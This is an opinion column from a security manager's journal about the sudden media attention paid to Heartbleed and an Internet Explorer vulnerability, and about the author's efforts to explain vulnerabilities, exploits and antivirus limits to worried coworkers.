Security Manager's Journal: With Heartbleed, suddenly the world is paying attention to security
Why have recent vulnerabilities gotten so much more attention than the ones that preceded them? It's hard to say, but the new awareness is a mixed blessing.
Suddenly I'm getting swamped with requests for information from people at work who never used to care about what I do. They are hearing about these vulnerabilities on the mainstream news, getting scared, and coming to me for advice. Is this good or bad?
Frankly, I don't understand why the mainstream media is picking on these particular vulnerabilities, when there are (and have been) so many others to choose from. It may be because of the buzz around the end of Windows XP security updates, and the news coverage of the security risks of unmatched vulnerabilities.
My first reaction to Heartbleed was, "Who cares?" Let's talk about some actual exploits, like the card number thefts at big retailers or the password thefts from AOL, LinkedIn, Facebook and Gmail. Those are a really big deal because they actually happened and caused great harm. Vulnerabilities? Sure, they are important, and professionals like me take them very seriously, but I don't see any reason why anybody else should be more concerned about them than any others. Vulnerabilities as a whole are bad, but the individual ones that are popping up in the news aren't something that should concern the average person. Exploits, yes; vulnerabilities, no.
My reaction to the recently announced Internet Explorer Flash vulnerability was similar. Why are we talking about this? The media is saying the vulnerability allows "remote command execution," which they say allows an attacker to completely take over a victim's computer. Yeah, so? We get a dozen of those announced every month from Microsoft and other platform vendors. Why is this one hitting the news?
I'm guessing here, but it may be the name. Heartbleed is a pretty cool moniker, isn't it? The average person who isn't into technology or security is going to perk up upon hearing that word. It invokes garish images, doesn't it? Maybe the first news reporter heard the name and thought it would get a lot of attention. He or she was right, if that's the case.
In any case, I've recently been finding myself walking through the door at work and answering throngs of concerned citizens wanting to know about these viruses. That's right, they think Heartbleed and the new Internet Explorer bug are viruses that are going to take over all the computers. I have to explain the difference between a vulnerability and an exploit, and I don't even want to get into all the varieties of actions that an exploit can take.
Talking, emailing and posting about these issues is starting to take up a lot of my time. That's good, and bad. On the positive side, I suddenly have a new opportunity to educate the general public about stuff that I care about (and they should care about), namely the cycle of software flaws that lead to discovered vulnerabilities and on to exploits, and the concept of "zero-day," which renders a lot of our defenses useless. It's also a good opportunity to explain how antivirus software works, what it protects against and its shortcomings (signature-based detection is only as good as the malware fingerprints within the antivirus database, and malware can do a lot of damage before a signature is deployed to detect it). I also like to take the opportunity to describe alternative malware detection and prevention technologies, such as behavior-based detection and command-and-control server callback detection. But when I get to that point, eyes start to glaze over and the listener starts looking at his watch. On the negative side, all this time spent discussing (and defanging) the news is biting into the time that I should be spending dealing with real security issues that affect my company.
I guess I really shouldn't complain -- with security in the news, more people will become aware of what we security managers and practitioners do all day, and hopefully start to value it more. "Good thing we have these security professionals keeping us all safe," I imagine them saying. We're getting our 15 minutes of fame, and while I don't really understand why, I can't wait to see what's next.
This week's journal is written by a real security manager, "J.F. Rice," whose name and employer have been disguised for obvious reasons. Contact him at email@example.com.
To join in the discussions about security, go to blogs.computerworld.com/security.
More by J.F. Rice
- Security Manager's Journal: Peering behind the firewall
- Security Manager's Journal: Trapped: Building access controls go kablooey
- Security Manager's Journal: We manage our threats, but what about our vendors?
- Security Manager's Journal: With Heartbleed, suddenly the world is paying attention to security
- Security Manager's Journal: A rush to XP's end of life
- Security Manager's Journal: Security flaw shakes faith in Apple mobile devices
- Security Manager's Journal: Cyberattacks just got personal
- Security Manager's Journal: Target breach unleashes fresh scams
- Security Manager's Journal: Giving thanks for SIEM
- Security Manager's Journal: Hashing out secure applications
Read more about Security in Computerworld's Security Topic Center.
- Troubleshooting Common Issues in VoIP Learn more about Voice over Internet Protocol (VoIP), including common VoIP metrics used, best practices in VoIP management and tips and tricks for...
- 2013 Network Management Software (NMS) Buyers Guide This white paper contains an independent comparison study of six different network management solutions and provides guidance on how you can choose the...
- Rightsizing Your Network Performance Management Solution: 4 Case Studies This white paper discusses challenges encountered as organizations search for the most cost-effective network performance management solution.
- Global Growing Pains: Tapping into B2B Integration Services to Overcome Global Expansion Challenges A recent survey by IDG Research explored both the challenges and pain points companies face when growing globally, as well as the capabilities...
- E-Signature RFP Checklist Webcast If your organization is looking to adopt e-signatures, you may be overwhelmed by the number of providers that offer seemingly similar solutions. How...
- Cloud and Collaboration: Driving Your Business Value Mission Critical Cloud from Peer 1 Hosting is enterprise-grade. All Security White Papers | Webcasts
Our new bimonthly Internet of Things newsletter helps you keep pace with the rapidly evolving technologies, trends and developments related to the IoT. Subscribe now and stay up to date!